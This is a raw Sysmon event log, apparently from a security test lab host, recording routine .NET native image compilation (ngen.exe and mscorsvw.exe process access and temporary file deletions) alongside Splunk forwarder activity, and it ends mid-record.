21:07:10.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-A27E-60D3-B105-00000000CF01}6616NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WXFKYWBWQM\PresentationFramework.Royale.ni.dll.auxMD5=56F390B4026C92CCEEABF0A268D982C8,SHA256=921BBC0BA241B3245FB28BDF109DEC35287D9DFB2DDC37DF6A1F9CAC8FAEDD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-A27E-60D3-B105-00000000CF01}6616NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WXFKYWBWQM\PresentationFramework.Royale.ni.dllMD5=9773C82D63BAF79DD7A5BD176D3F2F40,SHA256=C13DA5170060B5FEB711BBCD3589A405D94154FC63089A138E5C68089EFF6207,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.295{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4252A38DF68D7A56A4339DE4BB1EEDD4,SHA256=A67D67EDAB5D6418CFF5405F148B64C9E514A90F012B2664548DB3176A268CD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.295{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-A27E-60D3-B005-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ENLJGBEE8N\PresentationFramework.Luna.ni.dll.auxMD5=DE62C0201D0D43381C9CF2D304D0F522,SHA256=389C1EA38099D62D9A9BEA5D838278781BA50DC1A9179B5315A84F56CB74FEF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-A27E-60D3-B005-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ENLJGBEE8N\PresentationFramework.Luna.ni.dllMD5=179A0AE9A9C89EC3D44638AED665E2D3,SHA256=6626CAD6D91597D050F69726F654A54D88196ABCDDCDC79D59146B9A0CE84E66,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.168{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.152{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.152{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.136{4DB9351A-A27E-60D3-AF05-00000000CF01}4480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68RL3BVWE4\PresentationFramework.Classic.ni.dll.auxMD5=BAED2E45D30C36864DE9EA27892916F5,SHA256=58CA80E6DC5CCA84A1442E72126046C5EC91669129586F1A0310571058264C7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.136{4DB9351A-A27E-60D3-AF05-00000000CF01}4480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68RL3BVWE4\PresentationFramework.Classic.ni.dllMD5=8E25CC443371ABCDFF7D349B68D31584,SHA256=ACF5FE834F592D971C5FCA6A989C9CF6F47DB4A77C90D5B7E5562C02184AD9FC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.089{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.089{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA09D769E1B8B6F9640C5F217085A28,SHA256=07C578ED3B2771261ADD7EC4E0736CFBD72E4E06186F07A5AED8FC11E7362A03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A27E-60D3-AE05-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1QNJULDUR5\PresentationFramework.AeroLite.ni.dll.auxMD5=670E69144108250A7E3475FB92CE3676,SHA256=44C6074B56D315558125E598C88AAD7F3CF148F929618F6F6D84DF33E30BEE09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A27E-60D3-AE05-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1QNJULDUR5\PresentationFramework.AeroLite.ni.dllMD5=8E4D9163419F82820922D574536CF84A,SHA256=873AA6A9949CEE27AB3C31453E145811F775ECA7618F567DBB3BE4ECA1AC7EE7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.042{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.011{4DB9351A-A27D-60D3-AD05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\E5XRBD8STM\PresentationFramework.Aero.ni.dll.auxMD5=398B5E1FECE5B43CEEEA752E083BAFD6,SHA256=4DC5B07C3DCE394E698A8379A5FFAF247845F4D868D3047D333E32D55406CAA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.011{4DB9351A-A27D-60D3-AD05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\E5XRBD8STM\PresentationFramework.Aero.ni.dllMD5=05E2EA65D124A8534A8041EC5E5BE035,SHA256=F0733782822A10F4C227AE66C9F099E5877972D6C82B65263D9CC1C434EFEA3C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-A27F-60D3-BA05-00000000CF01}5476NT 